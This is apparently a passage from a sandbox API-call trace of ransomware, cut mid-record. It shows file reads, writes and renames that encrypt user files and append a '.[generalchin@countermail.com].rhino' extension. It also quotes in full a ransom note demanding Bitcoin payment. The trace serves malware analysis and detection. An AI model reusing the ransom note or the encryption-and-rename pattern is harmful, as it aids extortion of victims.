Recipient.MAPIMail" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\mail recipient.mapimail"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0090.902] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x4 [0090.903] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x124, nNumberOfBytesToLockHigh=0x0) returned 1 [0090.903] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.903] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x4, lpOverlapped=0x0) returned 1 [0090.982] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0090.982] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.982] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0090.982] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0090.982] GetLastError () returned 0x0 [0090.982] SetLastError (dwErrCode=0x0) [0090.982] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0090.982] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0090.982] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0090.982] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b00e0 [0090.982] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b01e8 [0090.983] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00e0 | out: hHeap=0x6d0000) returned 1 [0090.983] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.983] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b828 [0090.983] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0090.983] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.983] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b828 [0090.983] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0090.983] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0090.983] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.983] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x124) returned 0x23b0370 [0090.983] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0090.983] WriteFile (in: hFile=0x104, lpBuffer=0x23b0370*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b0370*, lpNumberOfBytesWritten=0x2cfa04*=0x124, lpOverlapped=0x0) returned 1 [0090.984] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0370 | out: hHeap=0x6d0000) returned 1 [0090.984] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x124, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0090.984] CloseHandle (hObject=0x104) returned 1 [0090.986] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x23b00e0 [0090.986] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x23b0370 [0090.986] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00e0 | out: hHeap=0x6d0000) returned 1 [0090.986] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\mail recipient.mapimail"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\mail recipient.mapimail.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0090.987] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0370 | out: hHeap=0x6d0000) returned 1 [0090.987] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01e8 | out: hHeap=0x6d0000) returned 1 [0090.987] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.987] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0090.987] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0090.987] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x23b0048 [0090.987] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x23b00e0 [0090.987] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0090.987] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.988] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00e0 | out: hHeap=0x6d0000) returned 1 [0090.988] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\themes\\transcodedwallpaper.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0090.988] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x9cfab [0090.988] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x9d0cb, nNumberOfBytesToLockHigh=0x0) returned 1 [0090.988] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.988] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0090.990] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.991] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x9cfab, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x9cfab, lpOverlapped=0x0) returned 1 [0091.025] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0091.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0091.025] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0091.025] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0091.025] GetLastError () returned 0x0 [0091.026] SetLastError (dwErrCode=0x0) [0091.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0091.026] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9cfce) returned 0x120020 [0091.188] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0091.188] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b0048 [0091.188] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b0150 [0091.188] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0091.188] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.188] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0091.188] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0091.189] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0091.189] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0091.189] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0091.189] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0091.189] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0091.189] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0091.189] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0091.189] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0091.189] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0091.189] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0091.189] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0091.189] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0091.189] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0091.189] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0091.189] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0091.189] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0091.189] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0091.189] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0091.189] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0091.189] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0091.190] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0091.190] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x23b0048 [0091.190] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0091.190] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b02d8 [0091.190] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0091.190] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b03b8 [0091.190] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02d8 | out: hHeap=0x6d0000) returned 1 [0091.190] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x23b0500 [0091.190] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b03b8 | out: hHeap=0x6d0000) returned 1 [0091.190] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x23b06e8 [0091.190] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0500 | out: hHeap=0x6d0000) returned 1 [0091.190] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x23b09b8 [0091.190] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b06e8 | out: hHeap=0x6d0000) returned 1 [0091.190] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x23b02d8 [0091.190] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b09b8 | out: hHeap=0x6d0000) returned 1 [0091.190] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x75ef78 [0091.190] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02d8 | out: hHeap=0x6d0000) returned 1 [0091.190] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x75f8e0 [0091.191] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0091.191] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x7606f8 [0091.191] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f8e0 | out: hHeap=0x6d0000) returned 1 [0091.191] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x761c38 [0091.191] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7606f8 | out: hHeap=0x6d0000) returned 1 [0091.191] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x763c00 [0091.191] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x761c38 | out: hHeap=0x6d0000) returned 1 [0091.248] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x75ef78 [0091.248] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763c00 | out: hHeap=0x6d0000) returned 1 [0091.249] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x7636c8 [0091.249] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0091.249] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x72bfe8 [0091.250] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7636c8 | out: hHeap=0x6d0000) returned 1 [0091.250] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x73c0b8 [0091.251] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bfe8 | out: hHeap=0x6d0000) returned 1 [0091.252] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x70a650 [0091.254] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0091.255] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x21c32) returned 0x781f78 [0091.258] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a650 | out: hHeap=0x6d0000) returned 1 [0091.259] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x32a39) returned 0x24b0048 [0091.273] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x781f78 | out: hHeap=0x6d0000) returned 1 [0091.275] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4bf44) returned 0x23b02d8 [0091.281] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0091.284] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x71ed4) returned 0x24b0048 [0091.287] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02d8 | out: hHeap=0x6d0000) returned 1 [0091.291] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xaae2c) returned 0x26b0020 [0092.157] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x9d0cb, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0092.157] CloseHandle (hObject=0x104) returned 1 [0092.157] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x23b0048 [0092.157] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x75ef78 [0092.157] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0092.157] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\themes\\transcodedwallpaper.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\themes\\transcodedwallpaper.jpg.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0092.158] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0092.158] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0150 | out: hHeap=0x6d0000) returned 1 [0092.158] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x120020 | out: hHeap=0x6d0000) returned 1 [0092.164] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x75ef78 [0092.164] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0092.164] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0092.164] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x75f010 [0092.164] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0092.164] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\themes\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0092.165] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0092.165] WriteFile (in: hFile=0x104, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x2cfa5c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x2cfa5c*=0x2a4, lpOverlapped=0x0) returned 1 [0092.167] CloseHandle (hObject=0x104) returned 1 [0092.167] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f010 | out: hHeap=0x6d0000) returned 1 [0092.167] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0092.296] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0xa [0092.296] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x12a, nNumberOfBytesToLockHigh=0x0) returned 1 [0092.296] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.296] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0xa, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0xa, lpOverlapped=0x0) returned 1 [0092.298] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0092.298] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0092.298] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0092.299] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0092.299] GetLastError () returned 0x0 [0092.299] SetLastError (dwErrCode=0x0) [0092.299] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0092.299] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa) returned 0x6df110 [0092.299] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0092.299] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x75f010 [0092.299] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x75f118 [0092.299] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f010 | out: hHeap=0x6d0000) returned 1 [0092.299] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.299] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0092.299] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0092.299] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0092.299] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0092.299] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0092.299] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0092.299] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0092.300] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0092.300] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0092.300] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0092.300] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0092.300] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df0f8 [0092.300] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0092.300] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x12a) returned 0x75f2a0 [0092.300] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0092.300] WriteFile (in: hFile=0x104, lpBuffer=0x75f2a0*, nNumberOfBytesToWrite=0x12a, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x75f2a0*, lpNumberOfBytesWritten=0x2cfa04*=0x12a, lpOverlapped=0x0) returned 1 [0092.300] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f2a0 | out: hHeap=0x6d0000) returned 1 [0092.300] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x12a, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0092.300] CloseHandle (hObject=0x104) returned 1 [0092.302] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d698 [0092.302] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x136) returned 0x75f2a0 [0092.302] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75d698 | out: hHeap=0x6d0000) returned 1 [0092.302] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0092.303] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f2a0 | out: hHeap=0x6d0000) returned 1 [0092.303] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f118 | out: hHeap=0x6d0000) returned 1 [0092.303] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0092.303] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x75f010 [0092.303] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0092.303] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x75f0b8 [0092.303] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x75f160 [0092.303] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, 